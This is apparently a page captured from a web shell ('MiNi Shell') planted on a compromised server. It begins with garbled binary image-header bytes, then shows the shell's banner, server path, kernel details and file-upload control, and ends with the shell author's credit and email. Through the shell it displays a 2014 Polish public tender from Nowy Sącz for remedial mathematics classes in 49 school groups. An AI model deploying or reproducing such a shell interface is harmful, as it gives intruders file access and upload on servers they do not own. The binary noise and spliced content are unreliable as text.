JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141014/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141014/216817-N-2014.html

<p class="kh_header"><b>Nowy Sącz: PCFE.272.71.2014 Przeprowadzenie zajęć dydaktyczno - wyrównawczych z matematyki w ramach projektu pn. Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 216817 - 2014; data zamieszczenia: 14.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Funduszy Europejskich , ul. Kościuszki 3, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 262 18 92, faks 18 262 18 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcfe.powiat-ns.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PCFE.272.71.2014 Przeprowadzenie zajęć dydaktyczno - wyrównawczych z matematyki w ramach projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzanie zajęć dydaktyczno - wyrównawczych z matematyki dla uczniów ponadgimnazjalnych szkół zawodowych, dla których organem prowadzącym jest Powiat Nowosądecki i mających siedzibę na terenie powiatu nowosądeckiego. Zamówienie realizowane jest w ramach projektu pn.: Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.
2. Zamówienie zostało podzielone na czterdzieści dziewięć (49) części:
Część 1: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 1,
Część 2: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 2,
Część 3: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 3,
Część 4: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 4,
Część 5: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 5,
Część 6: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 6,
Część 7: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 7,
Część 8: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 8,
Część 9: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 9,
Część 10: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 10,
Część 11: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 11,
Część 12: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, grupa 12,
Część 13: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół im. Św. Kingi w Łącku, grupa 1,
Część 14: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół im. Św. Kingi w Łącku, grupa 2,
Część 15: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół im. Św. Kingi w Łącku, grupa 3,
Część 16: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół im. Św. Kingi w Łącku, grupa 4,
Część 17: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 1,
Część 18: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 2,
Część 19: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 3,
Część 20: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 4,
Część 21: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 5,
Część 22: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 6,
Część 23: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 7,
Część 24: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 8,
Część 25: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 9,
Część 26: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 10,
Część 27: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 11,
Część 28: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 12,
Część 29: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 13,
Część 30: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, grupa 14,
Część 31: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Władysława St. Reymonta w Tęgoborzu, grupa 1,
Część 32: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Władysława St. Reymonta w Tęgoborzu, grupa 2,
Część 33: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Władysława St. Reymonta w Tęgoborzu, grupa 3,
Część 34: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Władysława St. Reymonta w Tęgoborzu, grupa 4,
Część 35: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Jana Pawła II w Krynicy Zdrój, grupa 1,
Część 36: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Jana Pawła II w Krynicy Zdrój, grupa 2,
Część 37: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Jana Pawła II w Krynicy Zdrój, grupa 3,
Część 38: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Jana Pawła II w Krynicy Zdrój, grupa 4,
Część 39: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Ponadgimnazjalnych im. Jana Pawła II w Krynicy Zdrój, grupa 5,
Część 40: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Zawodowych im. Stanisława Staszica w Grybowie, grupa 1,
Część 41: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Zawodowych im. Stanisława Staszica w Grybowie, grupa 2,
Część 42: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Zawodowych im. Stanisława Staszica w Grybowie, grupa 3,
Część 43: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Zawodowych im. Stanisława Staszica w Grybowie, grupa 4,
Część 44: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Zawodowych im. Stanisława Staszica w Grybowie, grupa 5,
Część 45: Zajęcia dydaktyczno-wyrównawcze z matematyki w Zespole Szkół Zawodowych im. Św. Kingi w Podegrodziu, grupa 1,
Część 46: Zajęcia dydaktyczno-wyrównawcze z matematyki w Powiatowym Zespole Szkół w Muszynie - Technikum w Złockiem, grupa 1,
Część 47: Zajęcia dydaktyczno-wyrównawcze z matematyki w Powiatowym Zespole Szkół w Muszynie - Technikum w Złockiem, grupa 2,
Część 48: Zajęcia dydaktyczno-wyrównawcze z matematyki w Powiatowym Zespole Szkół w Muszynie - Technikum w Złockiem, grupa 3,
Część 49: Zajęcia dydaktyczno-wyrównawcze z matematyki w Powiatowym Zespole Szkół w Muszynie - Technikum w Złockiem, grupa 4.
Zamawiający dopuszcza możliwość składania ofert częściowych.
Jeden Wykonawca może złożyć oferty na dowolnie wybrane przez siebie maksymalnie pięć części zamówienia.
Oferty Wykonawcy, składane na więcej niż pięć części zostaną odrzucone.
3. Zamawiający podzielił przedmiot zamówienia na 49 części, na które składa się 49 grup uczniów w ośmiu szkołach ponadgimnazjalnych. Jedna grupa uczniów liczy 7 - 13 osób.
4. Szczegóły dotyczące realizacji przedmiotu zamówienia (wymogi dotyczą wszystkich części wskazanych w pkt 2):
1) Zajęcia odbędą się w terminie od dnia podpisania umowy do dnia 15 czerwca 2014 r. Pełne rozliczenie zajęć Wykonawca jest zobowiązany przedstawić Zamawiającemu w terminie do 19 czerwca 2015 roku.
2) Łączna liczba godzin z matematyki wynosi 1715 dla 49 grup, w tym:
a) 343 godziny w roku 2014,
b) 1372 godziny w roku 2015,
przy czym 1 godzina = 1 godzina lekcyjna = 45 minut.
3) Na jedną grupę 7 - 13 osobową w roku szkolnym 2014/2015 przypada 35 godzin do zrealizowania w podziale:
a) 7 godzin w 2014 roku,
b) 28 godzin w 2015 roku.
4) Zajęcia prowadzone będą zgodnie z podstawą programową nauczania matematyki dla danego poziomu edukacyjnego.
5) Zajęcia należy przeprowadzić na terenie powiatu nowosądeckiego, w szkołach objętych projektem, wskazanych w nazwie poszczególnej części. Szkoły udostępniają nieodpłatnie sale do prowadzenia zajęć. Adresy szkół:
a) Zespół Szkół Ponadgimnazjalnych im. Wincentego Witosa w Nawojowej, 33-335 Nawojowa 348 - od Części 1 do Części 12,
b) Zespół Szkół im. Św. Kingi w Łącku, 33-390 Łącko 26 - od Części 13 do Części 16,
c) Zespół Szkół Ponadgimnazjalnych im. ks. prof. Józefa Tischnera w Starym Sączu, ul. Daszyńskiego 15, 33-340 Stary Sącz - od Części 17 do Części 30,
d) Zespół Szkół Ponadgimnazjalnych im. Władysława St. Reymonta w Tęgoborzu, 33-312 Tęgoborze 193 - od Części 31 do Części 34,
e) Zespół Szkół Ponadgimnazjalnych im. Jana Pawła II w Krynicy Zdrój, 
ul. Nadbrzeżna 3, 33-380 Krynica Zdrój - od Części 35 do Części 39,
f) Zespół Szkół Zawodowych im. Stanisława Staszica w Grybowie, ul. Armii Krajowej 19, 33-330 Grybów - od Części 40 do Części 44,
g) Zespół Szkół Zawodowych im. Św. Kingi w Podegrodziu, 33-386 Podegrodzie 170 -Część 45,
h) Powiatowy Zespół Szkół w Muszynie - Technikum w Złockiem, ul. Rynek 13, 
33-370 Muszyna - od Części 46 do Części 49.
6) Wykonawca zobowiązany jest do opracowania miesięcznych harmonogramów zajęć dydaktyczno-wyrównawczych w porozumieniu z przedstawicielem Zamawiającego (Szkolnym Liderem Projektu). Harmonogramy zajęć będą przekazywane Szkolnemu Liderowi Projektu na każdy kolejny miesiąc w terminie do końca miesiąca poprzedzającego miesiąc realizacji zajęć, a w pierwszym miesiącu w terminie do 3 dni od dnia podpisania umowy.
7) Wykonawca zobowiązany jest do prowadzenia zajęć zgodnie z przedstawionym i zaakceptowanym harmonogramem. W wyjątkowych przypadkach, wynikających z przyczyn losowych lub siły wyższej dopuszcza się możliwość dokonania zmian w harmonogramie. O zmianach należy poinformować Szkolnego Lidera Projektu najpóźniej w tym samym dniu, w którym mają nastąpić zmiany.
8) Szkolny Lider Projektu akceptuje i nadzoruje wykonane przez Wykonawcę zadania w układzie comiesięcznym poprzez złożenie na dokumentach swojego podpisu wraz z pieczęcią szkoły.
9) Wykonawca jest zobowiązany do pisemnego informowania Szkolnego Lidera Projektu o niepokojących przypadkach/zjawiskach w związku z realizacją zajęć, w tym o powtarzających się nieobecnościach uczniów na zajęciach.
10) Wykonawca jest zobowiązany do brania udziału w badaniach monitorujących efektywność projektu.
11) Wykonawca jest zobowiązany do prowadzenia na każdych zajęciach dziennika zajęć, list obecności uczniów i dokumentacji dydaktycznej z należytą starannością oraz na bieżąco.
12) Zamawiający wymaga prowadzenia list obecności oraz dziennika zajęć (Rozdział: Wykaz uczęszczania uczniów na zajęcia oraz Rozdział: Realizacja programu zajęć) w formie rozliczenia godzinowego.
13) Błędy pisarskie w prowadzonej dokumentacji należy poprawić poprzez skreślenie błędnej treści i wpisanie treści prawidłowej. Poprawkę należy zaopatrzyć w datę i podpis osoby dokonującej poprawki - zabrania się używać korektora.
14) Wykonawca zobowiązany jest do prowadzenia ewidencji czasu pracy wykonanej na rzecz projektu w postaci sporządzania miesięcznych kart czasu pracy potwierdzających przeprowadzenie w danym miesiącu określonej liczby zajęć.
15) Wykonawca zobowiązany jest do sprawowania opieki nad uczniami w trakcie trwania zajęć.
16) Osoba/-y, która/-e będzie/będą uczestniczyć w wykonywaniu zamówienia musi/muszą posiadać kwalifikacje/uprawnienia do nauczania matematyki w szkole ponadgimnazjalnej zgodne z § 2 ust. 1 Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (tekst jednolity Dz. U. z 2013 r. poz. 1207)
17) Zamawiający wymaga stałości kadry uczącej - dana grupa może mieć zajęcia tylko z jednym tym samym nauczycielem. Oznacza to, że jeden nauczyciel realizuje wszystkie godziny przypisane do jednej grupy.
W wyjątkowych przypadkach wynikających z przyczyn losowych lub siły wyższej, Wykonawca musi zapewnić zastępstwo celem realizacji zajęć i poinformować o tym fakcie Zamawiającego najpóźniej w tym samym dniu, w którym ma nastąpić zmiana. Osoba wskazana jako zastępca musi posiadać kwalifikacje/uprawnienia, o których mowa w ppkt 16.
19) Dokumentami potwierdzającymi należyte wykonanie zamówienia będą (przedłożone w oryginale):
a) dzienniki zajęć,
b) listy obecności,
c) miesięczne karty czasu pracy,
d) harmonogramy zajęć.
Dane zawarte w powyższej dokumentacji muszą być ze sobą spójne.
20) Wykonawca zobowiązany jest do prowadzenia dokumentacji zgodnie z podanymi przez przedstawiciela Zamawiającego wzorami.
5. Szczegółowy opis przedmiotu zamówienia w specyfikacji istotnych warunków zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 49.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (Załącznik 
nr 3 do specyfikacji).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (Załącznik 
nr 3 do specyfikacji).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (Załącznik 
nr 3 do specyfikacji).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Wykonawca powinien dysponować minimum jedną osobą, posiadającą kwalifikacje/uprawnienia do nauczania matematyki w szkole ponadgimnazjalnej zgodne z § 2 ust. 1 Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (tekst jednolity Dz. U. z 2013 r. 
poz. 1207).
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (Załącznik nr 3 do specyfikacji). Składając oświadczenie o spełnieniu warunków udziału w postępowaniu Wykonawca oświadcza również, że dysponuje minimum jedną osobą, posiadającą kwalifikacje/uprawnienia do nauczania matematyki w szkole ponadgimnazjalnej zgodne z § 2 ust. 1 Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (tekst jednolity Dz. U. z 2013 r. poz. 1207).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (Załącznik 
nr 3 do specyfikacji).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty powinien być dołączony dokument określający zasady reprezentacji oraz osoby uprawnione do
reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo,
określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.malopolska.pl/pcfens<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Funduszy Europejskich, 33-300 Nowy Sącz, ul. Kościuszki 3, Grzegorz Poręba, pokój nr 8..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2014 godzina 12:00, miejsce: Powiatowe Centrum Funduszy Europejskich, 33-300 Nowy Sącz, ul.
Kościuszki 3, Informacja - Dziennik Podawczy (pokój nr 7).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu pn.: Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com